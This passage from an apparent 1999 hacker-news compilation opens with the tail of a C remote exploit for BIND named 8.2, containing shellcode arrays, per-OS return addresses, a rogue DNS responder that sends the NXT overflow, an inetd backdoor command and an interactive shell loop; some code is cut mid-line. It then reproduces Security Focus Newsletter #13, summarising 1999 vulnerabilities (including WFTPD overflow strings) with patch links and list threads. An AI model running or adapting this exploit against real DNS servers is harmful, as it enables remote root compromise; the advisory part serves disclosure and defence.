0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46,0x34,0x50,0x8d,0x46, 0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9,0xc1,0xfe,0xff,0xff, 0xe8,0xd2,0xff,0xff,0xff,0xe8,0x27,0xfe,0xff,0xff,0x2e,0x0,0x41,0x44,0x4d, 0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f, 0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68,0x0,0x2d,0x63,0x0, 0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f,0x59,0x4f,0x59,0x4f, 0x59,0x4f,0x0}; char bsdnochroot[]= {0xe9,0x79,0x1,0x0,0x0,0x5e,0x50,0xb8,0x2,0x0,0x0,0x0,0xcd,0x80,0x85,0xc0,0xf, 0x85,0xe6,0x0,0x0,0x0,0x8d,0x56,0x38,0x89,0x56,0x28,0x8d,0x46,0x40,0x89,0x46, 0x2c,0x8d,0x46,0x43,0x89,0x46,0x30,0x8d,0x46,0x30,0x50,0x8d,0x46,0x28,0x50, 0x52,0x50,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0x50,0x50,0xb8,0x1,0x0,0x0,0x0, 0xcd,0x80,0xe8,0xbc,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xff,0x0,0x0,0x0,0x62,0x6c, 0x61,0x68,0x62,0x6c,0x61,0x68,0x73,0x61,0x6d,0x65,0x74,0x68,0x69,0x6e,0x67, 0x79,0x65,0x74,0x61,0x6e,0x6f,0x74,0x68,0x65,0x72,0x73,0x70,0x61,0x63,0x65, 0x66,0x6f,0x72,0x61,0x73,0x6f,0x63,0x6b,0x61,0x64,0x64,0x72,0x73,0x74,0x72, 0x75,0x63,0x74,0x75,0x72,0x65,0x62,0x75,0x74,0x74,0x68,0x69,0x73,0x74,0x69, 0x6d,0x65,0x66,0x6f,0x72,0x74,0x68,0x65,0x62,0x73,0x64,0x73,0x68,0x65,0x6c, 0x6c,0x63,0x6f,0x64,0x65,0x66,0x6f,0x72,0x74,0x75,0x6e,0x61,0x74,0x6c,0x79, 0x74,0x68,0x69,0x73,0x77,0x69,0x6c,0x6c,0x77,0x6f,0x72,0x6b,0x69,0x68,0x6f, 0x70,0x65,0x6f,0x6b,0x69,0x74,0x68,0x69,0x6e,0x6b,0x65,0x6e,0x6f,0x75,0x67, 0x68,0x73,0x70,0x61,0x63,0x65,0x6e,0x6f,0x77,0x0,0x70,0x6c,0x61,0x67,0x75, 0x65,0x7a,0x5b,0x41,0x44,0x4d,0x5d,0x20,0x42,0x53,0x44,0x20,0x63,0x72,0x61, 0x70,0x70,0x79,0x20,0x73,0x68,0x65,0x6c,0x6c,0x63,0x6f,0x64,0x65,0x20,0x2d, 0x20,0x31,0x30,0x2f,0x39,0x39,0x31,0xd2,0xe9,0x3f,0xff,0xff,0xff,0x5e,0x8d, 
0x46,0x4,0x50,0x8d,0x46,0x8,0x50,0x52,0x52,0xb8,0x1f,0x0,0x0,0x0,0xcd,0x80, 0x5a,0x83,0xf8,0x0,0x75,0x6,0x80,0x7e,0x9,0x2,0x74,0xc,0x52,0x52,0xb8,0x6, 0x0,0x0,0x0,0xcd,0x80,0x42,0xeb,0xd7,0x6a,0x0,0x52,0x52,0xb8,0x5a,0x0,0x0, 0x0,0xcd,0x80,0x6a,0x1,0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0x6a,0x2, 0x52,0x52,0xb8,0x5a,0x0,0x0,0x0,0xcd,0x80,0xeb,0x29,0x5e,0x46,0x46,0x46,0x46, 0x46,0x8d,0x56,0x38,0x89,0x56,0x28,0xc7,0x46,0x2c,0x0,0x0,0x0,0x0,0x8d,0x46, 0x34,0x50,0x8d,0x46,0x28,0x50,0x52,0x52,0xb8,0x3b,0x0,0x0,0x0,0xcd,0x80,0xe9, 0xc0,0xfe,0xff,0xff,0xe8,0xd2,0xff,0xff,0xff,0xe8,0x82,0xfe,0xff,0xff,0x2e, 0x0,0x41,0x44,0x4d,0x52,0x4f,0x43,0x4b,0x53,0x0,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e,0x2f,0x2e,0x2e, 0x2f,0x2e,0x2e,0x2f,0x0,0x2e,0x2f,0x0,0x0,0xff,0xff,0xff,0xff,0xff,0xff,0xff, 0xff,0xff,0xff,0xff,0xff,0x0,0x0,0x0,0x0,0x2f,0x61,0x64,0x6d,0x2f,0x73,0x68, 0x0,0x2d,0x63,0x0,0x74,0x6f,0x75,0x63,0x68,0x20,0x2f,0x74,0x6d,0x70,0x2f, 0x59,0x4f,0x59,0x4f,0x59,0x4f,0x0}; struct arch { int id; char *name; char *code; int codesize; unsigned long safe; unsigned long ret; int length; }; struct arch archlist[] = { {1, "Linux Redhat 6.x - named 8.2/8.2.1 (from rpm)", linuxcode, sizeof(linuxcode), 0, 0xbfffd6c3, 6500}, {2, "Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1",linuxcode, sizeof(linuxcode), 0, 0x80f79ae, 6500}, {3, "Solaris 7 (0xff) - named 8.2.1", sc, sizeof(sc), 0xffbea738, 0xffbedbd0, 11000}, {4, "Solaris 2.6 - named 8.2.1", sc, sizeof(sc), 0xefffa000, 0xefffe5d0, 11000}, {5, "FreeBSD 3.2-RELEASE - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xbfbfbdb8, 7000}, {6, "OpenBSD 2.5 - named 8.2", bsdcode, sizeof(bsdcode), 1, 0xefbfbb00, 7000}, {7, "NetBSD 1.4.1 - named 8.2.1", bsdnochroot, sizeof(bsdnochroot), 1, 0xefbfbb00, 7000}, {0, 0, 0, 0} }; int arch=0; char *command=0; /* these two dns routines from dspoof/jizz */ /* pull out a compressed query name */ char *dnssprintflabel(char *s, char *buf, char *p) { unsigned 
short i,len; char *b=NULL; len=(unsigned short)*(p++); while (len) { while (len >= 0xC0) { if (!b) b=p+1; p=buf+(ntohs(*((unsigned short *)(p-1))) & ~0xC000); len=(unsigned short)*(p++); } for (i=0;i>/tmp/bob ; /usr/sbin/inetd -s /tmp/bob;/bin/rm -f /tmp/bob "); b=(unsigned long*)(a+4166); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //i5 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o0 - significant *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o2 - significant *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(0xdeadbeef); *b++=htonl(archlist[arch].safe); //o6 - significant *b++=htonl(archlist[arch].ret); //o7 - retaddr } } int form_response(HEADER *packet, char *buf) { char query[512]; int qtype; HEADER *dnsh; char *p; char *walker; memset(buf,0,sizeof(buf)); dnsh = (HEADER *) buf; dnsh->id = packet->id; dnsh->qr=1; dnsh->aa=1; dnsh->qdcount = htons(1); dnsh->ancount = htons(1); dnsh->arcount = htons(1); dnsh->rcode = 0; walker=(char*)(dnsh+1); p=dnssprintflabel(query, (char *)packet, (char*)(packet+1)); query[strlen(query) - 1] = 0; qtype=*((unsigned short *)p); printf("%s type=%d\n",query, ntohs(qtype)); /* first, the query */ walker=dnsaddlabel(walker, query); PUTSHORT(ntohs(qtype), walker); //PUTSHORT(htons(T_PTR), walker); PUTSHORT(1,walker); /* then, our answer */ /* query IN A 1.2.3.4 */ walker=dnsaddlabel(walker, query); PUTSHORT(T_A, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); PUTSHORT(4, walker); sprintf(walker,"%c%c%c%c",1,2,3,4); walker+=4; /* finally, we make named do something more interesting */ walker=dnsaddlabel(walker, query); PUTSHORT(T_NXT, walker); PUTSHORT(1, walker); PUTLONG(60*5, walker); /* the length of one label and our arbitrary data */ PUTSHORT(archlist[arch].length+7, walker); PUTSHORT(6, walker); 
sprintf(walker,"admadm"); walker+=6; PUTSHORT(0, walker); make_overflow(walker); walker+=archlist[arch].length; PUTSHORT(0, walker); return walker-buf; } #define max(x,y) ((x)>(y)?(x):(y)) int proxyloop(int s) { char snd[1024], rcv[1024]; fd_set rset; int maxfd, n; sleep(1); printf("Entering proxyloop..\n"); strcpy(snd, "cd /; uname -a; pwd; id;\n"); write(s, snd, strlen(snd)); for (;;) { FD_SET(fileno(stdin), &rset); FD_SET(s, &rset); maxfd = max(fileno(stdin), s) + 1; select(maxfd, &rset, NULL, NULL, NULL); if (FD_ISSET(fileno(stdin), &rset)) { bzero(snd, sizeof(snd)); fgets(snd, sizeof(snd) - 2, stdin); write(s, snd, strlen(snd)); } if (FD_ISSET(s, &rset)) { bzero(rcv, sizeof(rcv)); if ((n = read(s, rcv, sizeof(rcv))) == 0) exit(0); if (n < 0) { return -3; } fputs(rcv, stdout); } } return 0; } int main(int argc, char **argv) { int s, fromlen, res, sl, s2; struct sockaddr_in sa, from, to; char buf[16384]; char sendbuf[16384]; unsigned short ts; int i; if (argc<2) { fprintf(stderr,"Usage: %s architecture [command]\n", argv[0]); fprintf(stderr,"Available architectures:\n"); i=-1; while(archlist[++i].id) fprintf(stderr," %d: %s\n",archlist[i].id,archlist[i].name); exit(1); } arch=atoi(argv[1])-1; if (argc==3) command=argv[2]; if ((s=socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP))==-1) { perror("socket"); exit(1); } bzero(&sa, sizeof sa); sa.sin_family=AF_INET; sa.sin_addr.s_addr=INADDR_ANY; sa.sin_port=htons(53); if (bind(s, (struct sockaddr *)&sa, sizeof(sa))==-1) { perror("bind"); exit(1); } do { fromlen=sizeof(from); if ((res=recvfrom(s, buf, sizeof buf, 0, (struct sockaddr *)&from, &fromlen)) == -1) { perror("recvfrom"); exit(1); } printf("Received request from %s:%d for ", inet_ntoa(from.sin_addr), ntohs(from.sin_port)); sl=form_response((HEADER *)buf,sendbuf); /* now lets connect to the nameserver */ bzero(&to, sizeof(to)); to.sin_family=AF_INET; to.sin_addr=from.sin_addr; to.sin_port=htons(53); if ((s2=socket(AF_INET, SOCK_STREAM, 0))==-1) { perror("socket"); 
exit(1); } if (connect(s2, (struct sockaddr *)&to, sizeof to)==-1) { perror("connect"); exit(1); } ts=htons(sl); write(s2,&ts,2); write(s2,sendbuf,sl); if (archlist[arch].safe>1) close(s2); } while (archlist[arch].safe>1); /* infinite loop for sparc */ proxyloop(s2); exit(1); }

@HWA

53.0 Security Focus Newsletter #13
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Security Focus Newsletter #13
Table of Contents:

I. INTRODUCTION
II. BUGTRAQ SUMMARY
     1. Pacific Software URL Live! Directory Traversal Vulnerability
     2. Squid Web Proxy Authentication Failure Vulnerability
     3. Zeus Webserver Possible Remote root Compromise
     4. Falcon Web Server Directory Traversal Vulnerability
     5. AIX Filtering Vulnerability
     6. MacOS 9 Console Lock Bypass Vulnerability
     7. WFTPD Remote Buffer Overflow Vulnerability
     8. Netscape Messaging Server RCPT TO DoS Vulnerability
     9. Celtech ExpressFS USER Buffer Overflow Vulnerability
     10. NT Services Denial of Service
     11. FreeBSD Amanda 'amandad' Symlink Vulnerability
     12. Multiple Vendor Linux NIS Vulnerabilities
     13. aVirt Mail Server Buffer Overflow
III. PATCH UPDATES
     1. Vulnerability Patched: Zeus Webserver Possible Remote root Compromise
     2. Vulnerability Patched: Squid Web Proxy Authentication Failure
     3. Vulnerability Patched: Falcon Web Server Directory Traversal Vulnerability
     4. Vulnerability Patched: Debian, Redhat, SuSE NIS Vulnerabilities
IV. INCIDENTS SUMMARY
     1. Repeated FTP Connections (Thread)
     2. Re: Default Trojan Port list (Thread)
     3. SMB Port scanning (Thread)
     4. Re: More Log Sharing (Thread)
     5. Re: ICP (Internet Cache Protocol) problems... (Thread)
V. VULN-DEV RESEARCH LIST SUMMARY
     1. Re: IE 5.0 vulnerability (Thread)
     2. Re: possible gnome remote overflow (Thread)
     3. Re: Need help cracking wwwboard passwd.txt (Thread)
     4. ICQ 2000 (Thread)
     5. Re: forged packets? (Thread)
     6. Accessing IE/Netscape incomming data (Thread)
     7.
linux userland ip spoofing vulnerability (Thread)
     8. FreeBSD listen()
     9. stealth executables
     10. AIM 3.0
     11. Possibly exploitable overflow in Alibaba 2.0
VI. SECURITY JOBS
Discussion:
     1. IT security salary question (Thread)
Seeking Staff:
     1. Infrastructure Security Architect - DC Area
     2. Information Security Consultant(s) - NY #111
     3. Security Awareness Specialist - NY #215
VII. SECURITY SURVEY RESULTS
VIII. SECURITY FOCUS TOP 6 TOOLS
     1. Security Focus Pager (NT/98)
     2. ShadowScan (NT/98)
     3. East-Tec Eraser (NT/98)
     4. Evidence Eliminator (NT/98)
     5. Access Sentinel 3.0 (NT/98)
     6. Alot MoniCA 1.1 (NT/98)
IX. SPONSOR INFORMATION - NT OBJECTives, Inc.
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION

I. INTRODUCTION
-----------------

Welcome to the Security Focus 'week in review' newsletter issue 13,
sponsored by NT OBJECTives, Inc.

To start this newsletter we would like to introduce you to the newest
addition to the Security Focus team, Eric Schultze.

Eric Schultze is the new Director of Microsoft Content for Security Focus
Inc. Eric has been deploying, assessing, and securing Microsoft products
for the last 6 years, working first as a Network Administrator for a retail
organization, and later as a security professional for both Price
Waterhouse and Ernst & Young. Eric was a co-founder of the highly popular
"Extreme Hacking: Defending Your Site" course and is a popular speaker at
security events including Blackhat, CSI, and various international
conferences. He is a contributing author to "Hacking Exposed: Network
Security Secrets and Solutions" and is frequently quoted in the press,
including TIME Magazine, Infoworld, and ComputerWorld.

II. BUGTRAQ SUMMARY 1999-10-24 to 1999-11-01
---------------------------------------------

1. Pacific Software URL Live! Directory Traversal Vulnerability
BugTraq ID: 746
Remote: Yes
Date Published: 1999-10-28
Relevant URL:
http://www.securityfocus.com/bid/746
Summary:
The URL Live! free webserver from Pacific Software is susceptible to the
"../" directory traversal vulnerability. By using the '../' string in a
URL, an attacker can gain read access to files outside the intended web
file structure.

2. Squid Web Proxy Authentication Failure Vulnerability
BugTraq ID: 741
Remote: Yes
Date Published: 1999-10-25
Relevant URL:
http://www.securityfocus.com/bid/741
Summary:
There is a vulnerability present in certain versions of the Squid Web Proxy
Cache developed by the National Science Foundation. This problem is only in
effect when users of the cache are using an external authenticator. The
following is quoted from the original Bugtraq posting on this issue; this
message in its entirety is available in the 'Credits' section of this
vulnerability.

"After decoding the base64 encoded "user:password" pair given by the
client, squid doesn't strip out any '\n' or '\r' found in the resulting
string. Given such a string, any external authenticator will receive two
lines instead of one, and most probably send two results. Now, any
subsequent authentication exchange will have its answer shifted by one.
Therefore, a malicious user can gain access to sites he or she should not
have access to."

3. Zeus Webserver Possible Remote root Compromise
BugTraq ID: 742
Remote: Yes
Date Published: 1999-10-25
Relevant URL:
http://www.securityfocus.com/bid/742
Summary:
There are a number of vulnerabilities in the Zeus Web Server that, if
carried out in combination, can lead to a remote root compromise. The Zeus
Web Server gives its users the option to use a pre-built search CGI program
for their virtual website. The program accepts (as its http form variables)
server filesystem paths as its arguments. Because of this, it is possible
to display any file that the server has access to. Thus, by altering
parameters to "search", an attacker can obtain the password hash for the
admin user by displaying the configuration file. Once a password for the
admin user is cracked, it is possible to execute arbitrary commands through
the web based configuration UI as root (which the configuration UI runs
as).

4. Falcon Web Server Directory Traversal Vulnerability
BugTraq ID: 743
Remote: Yes
Date Published: 1999-10-26
Relevant URL:
http://www.securityfocus.com/bid/743
Summary:
The Falcon Webserver is a personal desktop webserver designed for low
volume page serving. Certain versions of this software do not properly
handle user supplied URLs. Therefore a user can browse outside of the web
server 'root' directory to any file on the file system, depending on
permissions. A second problem exists wherein a longer than expected URL
will elicit an error message from the server which betrays the location of
the 'root' directory.

5. AIX Filtering Vulnerability
BugTraq ID: 744
Remote: Yes
Date Published: 1999-10-26
Relevant URL:
http://www.securityfocus.com/bid/744
Summary:
The filtering modules for AIX 4.3.2 do not allow you to filter tcp port
numbers higher than 32767. This example was in the BugTraq posting
regarding this problem:

genfilt -v 4 -a D -s 0.0.0.0 -m 0.0.0.0 -d 0.0.0.0 -M 0.0.0.0 \
  -c udp -o any -O eq -P 123 -l n -w I -i all

Works fine... but...

genfilt -v 4 -a D -s 0.0.0.0 -m 0.0.0.0 -d 0.0.0.0 -M 0.0.0.0 -c udp \
  -o any -O eq -P 32768 -l n -w I -i all

Fails with:
Bad destination port/ICMP type "32768".

It is believed that this problem is a result of an incorrect type (short
int) being used for the port number argument. Compromise may occur through
services listening on ports that are higher than 32767.

6. MacOS 9 Console Lock Bypass Vulnerability
BugTraq ID: 745
Remote: No
Date Published: 1999-10-26
Relevant URL:
http://www.securityfocus.com/bid/745
Summary:
MacOS 9 includes an idle-activated console lock feature, similar to a
screensaver password in other operating systems. After a certain length of
user inactivity, a dialog box appears stating that a password must be
entered.
After the user clicks 'OK' another dialog box appears offering the option
to either supply a password or to log out the current user. If the 'log
out' option is chosen, any programs running will start to shut down. In
certain programs, dialog boxes are created in the shutdown process (for
example, "Exit without saving? OK/Cancel"). If the user selects 'Cancel',
the shutdown process is aborted and the user is returned to the current
session without ever having to enter a password.

7. WFTPD Remote Buffer Overflow Vulnerability
BugTraq ID: 747
Remote: Yes
Date Published: 1999-10-28
Relevant URL:
http://www.securityfocus.com/bid/747
Summary:
There is a remotely exploitable buffer overflow vulnerability in WFTPD that
is known to affect versions 2.34 and 2.40. The overflow exists in the MKD
and CWD commands, which, if given long string arguments in the right order,
can overrun the buffer and allow for arbitrary code execution on the target
host. This is from the BugTraq posting:

First command
MKD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Second command
CWD aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaa

Crash.....Overflow.

8. Netscape Messaging Server RCPT TO DoS Vulnerability
BugTraq ID: 748
Remote: Yes
Date Published: 1999-10-29
Relevant URL:
http://www.securityfocus.com/bid/748
Summary:
Netscape Messaging Server will not de-allocate memory that is used to store
the RCPT TO information for an incoming email. By sending enough long RCPT
TO addresses, the system can be forced to consume all available memory,
leading to a denial of service.

9. Celtech ExpressFS USER Buffer Overflow Vulnerability
BugTraq ID: 749
Remote: Yes
Date Published: 1999-10-29
Relevant URL:
http://www.securityfocus.com/bid/749
Summary:
Celtech's ExpressFS FTP server has been found to be vulnerable to a buffer
overflow. If an argument of sufficient length is passed after the USER
command, the next command sent will cause it to crash.

10. NT Services Denial of Service
BugTraq ID: 754
Remote: Yes
Date Published: 1999-10-31
Relevant URL:
http://www.securityfocus.com/bid/754
Summary:
A specially crafted packet can cause a denial of service on an NT 4.0 host,
rendering local administration and network communication next to useless.
This attack will crash the "services" executable, which, in turn, disables
the ability for the machine to perform actions via 'named pipes'. As a
consequence, users will be unable to remotely logon, logoff, manage the
registry, create new file share connections, or perform remote
administration. Services such as Internet Information Server may also fail
to operate as expected.

The problem lies within the manner in which srvsvc.dll makes calls to
services.exe. Certain MSRPC calls will return NULL values which are not
correctly interpreted by services.exe. This, in turn, may lead to a crash
of services.exe. If this denial of service is combined with a number of
other exploits, it may be possible to have this attack spawn a debugger
(i.e. Dr Watson) call on the host, which, if trojaned, may execute
malicious code on the target host.

11. FreeBSD Amanda 'amandad' Symlink Vulnerability
BugTraq ID: 752
Remote: No
Date Published: 1999-11-01
Relevant URL:
http://www.securityfocus.com/bid/752
Summary:
Amanda is a popular file backup system used by several free UNIX
distributions. Under certain versions of the distribution shipped with
FreeBSD 3.3-RELEASE the amanda daemon itself (amandad) is subject to a
symlink vulnerability which could result in a denial of service attack.
This is caused because amandad, during its process of operations, writes a
debug file to the /tmp directory. Amandad does not check for an existing
symlink of the same name before writing this file (/tmp/amandad.debug).
Amandad is not run SUID/SGID, so the end result of this vulnerability would
most likely be the ability to clobber other files owned by the UID which
owns the amandad process. The output in this case cannot be tailored and
consists of Amanda debug output.

12. Multiple Vendor Linux NIS Vulnerabilities
BugTraq ID: 753
Remote: Yes
Date Published: 1999-11-01
Relevant URL:
http://www.securityfocus.com/bid/753
Summary:
ypserv releases prior to 1.3.9 contain two different vulnerabilities: any
NIS domain administrator can inject password tables, and users can modify
the GECOS field and login shell values for other users. Also, rpc.yppasswd
prior to 1.3.6.92 has a standard buffer overflow problem in the md5 hash
generation code.

13. aVirt Mail Server Buffer Overflow
BugTraq ID: 755
Remote: Unknown
Date Published: 1999-10-31
Relevant URL:
http://www.securityfocus.com/bid/755
Summary:
The Avirt Mail Server 3.3a and 3.5 packages are vulnerable to a remote
buffer overflow. The buffer overflow can be initiated by passing 856
characters in the password field.

III. PATCH UPDATES 1999-10-24 to 1999-11-01
-------------------------------------------

1. Vendor: Zeus
Product: Zeus Webserver
Patch Location:
http://support.zeus.co.uk/news/exploit.html
Vulnerability Patched: Zeus Webserver Possible Remote root Compromise
BugTraq ID: 742
Relevant URLS:
http://www.securityfocus.com/bid/742

2. Vendor: National Science Foundation
Product: Squid Web Proxy
Patch Location:
http://squid.nlanr.net/Versions/v2/2.2/bugs/squid-2.2.stable5-newlines_in_auth.patch
Vulnerability Patched: Squid Web Proxy Authentication Failure Vulnerability
BugTraq ID: 741
Relevant URLS:
http://www.securityfocus.com/bid/741
http://squid.nlanr.net/Doc/Users-Guide/
http://squid.nlanr.net/

3.
Vendor: Blueface Software
Product: Falcon Webserver
Patch Location:
http://www.blueface.com/products.html#fws
Vulnerability Patched: Falcon Web Server Directory Traversal Vulnerability
BugTraq ID: 743
Relevant URLS:
http://www.securityfocus.com/bid/743

4. Vendor: Debian, Redhat, SuSE
Product: ypserv/NIS package
Patch Location:

-RedHat patches:
Red Hat Linux 4.x:
ftp://updates.redhat.com/4.2/i386/ypserv-1.3.9-0.4.2.i386.rpm
ftp://updates.redhat.com/4.2/alpha/ypserv-1.3.9-0.4.2.alpha.rpm
ftp://updates.redhat.com/4.2/sparc/ypserv-1.3.9-0.4.2.sparc.rpm
ftp://updates.redhat.com/4.2/SRPMS/ypserv-1.3.9-0.4.2.src.rpm
Red Hat Linux 5.x:
ftp://updates.redhat.com/5.2/i386/ypserv-1.3.9-0.5.2.i386.rpm
ftp://updates.redhat.com/5.2/alpha/ypserv-1.3.9-0.5.2.alpha.rpm
ftp://updates.redhat.com/5.2/sparc/ypserv-1.3.9-0.5.2.sparc.rpm
ftp://updates.redhat.com/5.2/SRPMS/ypserv-1.3.9-0.5.2.src.rpm
Red Hat Linux 6.x:
ftp://updates.redhat.com/6.1/i386/ypserv-1.3.9-1.i386.rpm
ftp://updates.redhat.com/6.0/alpha/ypserv-1.3.9-1.alpha.rpm
ftp://updates.redhat.com/6.0/sparc/ypserv-1.3.9-1.sparc.rpm
ftp://updates.redhat.com/6.1/SRPMS/ypserv-1.3.9-1.src.rpm

-SuSE patches:
ftp://ftp.suse.com/pub/suse/i386/update/6.1/n1/ypserv-1.3.9-0.i386.rpm
ftp://ftp.suse.com/pub/suse/axp/update/6.1/n1/ypserv-1.3.9-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/i386/update/6.2/n1/ypserv-1.3.9-0.i386.rpm

-Debian patches:
Source archives:
http://security.debian.org/dists/stable/updates/source/nis_3.5-2.diff.gz
http://security.debian.org/dists/stable/updates/source/nis_3.5-2.dsc
http://security.debian.org/dists/stable/updates/source/nis_3.5.orig.tar.gz
Architecture-specific binaries:
http://security.debian.org/dists/stable/updates/binary-alpha/nis_3.5-2_alpha.deb
http://security.debian.org/dists/stable/updates/binary-i386/nis_3.5-2_i386.deb
http://security.debian.org/dists/stable/updates/binary-m68k/nis_3.5-2_m68k.deb
http://security.debian.org/dists/stable/updates/binary-sparc/nis_3.5-2_sparc.deb
These files will be moved into
ftp://ftp.debian.org/debian/dists/stable/*/binary-$arch/ soon. For not yet
released architectures please refer to the appropriate directory
ftp://ftp.debian.org/debian/dists/sid/binary-$arch/.

Vulnerability Patched: Linux NIS Vulnerabilities
BugTraq ID: 753
Relevant URLS:
http://www.securityfocus.com/bid/753

IV. INCIDENTS SUMMARY 1999-10-24 to 1999-11-01
------------------------------------------

1. Repeated FTP Connections (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=Pine.LNX.4.10.9910251654160.20244-100000@ns.doomsday.com

2. Re: Default Trojan Port list (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=19991025150329.55777.qmail@hotmail.com

3. SMB Port scanning (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=19991026132728267.AAA391@paragon3.paragontech.com@dennisdcomp

4. Re: More Log Sharing (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=3816096E.F75578CA@cert.org

5. Re: ICP (Internet Cache Protocol) problems... (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-10-22&msg=Pine.LNX.4.10.9910280257540.492-100000@mad.unix.kg

V. VULN-DEV RESEARCH LIST SUMMARY 1999-10-24 to 1999-11-01
----------------------------------------------------------

1. Re: IE 5.0 vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=000201bf1e48$65a2cd30$021d85d1@youwant.to

2. Re: possible gnome remote overflow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=38135F5B.3A2B2369@cse.ogi.edu

3. Re: Need help cracking wwwboard passwd.txt (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910240555.PAA28579@rockhampton-psvr.qld.hotkey.net.au

4. ICQ 2000 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=19991025114035.J5069@securityfocus.com

5. Re: forged packets? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=001a01bf1f1c$86c8dfc0$021d85d1@youwant.to

6. Accessing IE/Netscape incomming data (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=2321.991026@infinet.com

7. linux userland ip spoofing vulnerability (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=Pine.LNX.4.10.9910270708380.638-200000@yahoo.com

8. FreeBSD listen()
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=3701.991027@SECURITY.NNOV.RU

9. stealth executables
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910270223.MAA09528@rockhampton-psvr.qld.hotkey.net.au

10. AIM 3.0
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=19991028172023.18236.qmail@securityfocus.com

11. Possibly exploitable overflow in Alibaba 2.0
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-10-22&msg=199910281536.RAA18018@mail1.cityweb.de

VI. SECURITY JOBS SUMMARY 1999-10-24 to 1999-11-01
---------------------------------------------------

Discussion:

1. IT security salary question (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-22&msg=CB64F884F39FD2118EC600A024E6522C7F5483@wfhqex05.wangfed.com

Seeking Staff:

1. Infrastructure Security Architect - DC Area
Reply to: Steve Goldsby
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-10-15&msg=NCBBLNPMHFBGKOMJOGILKEOGFAAA.sgoldsby@integrate-u.com

1.
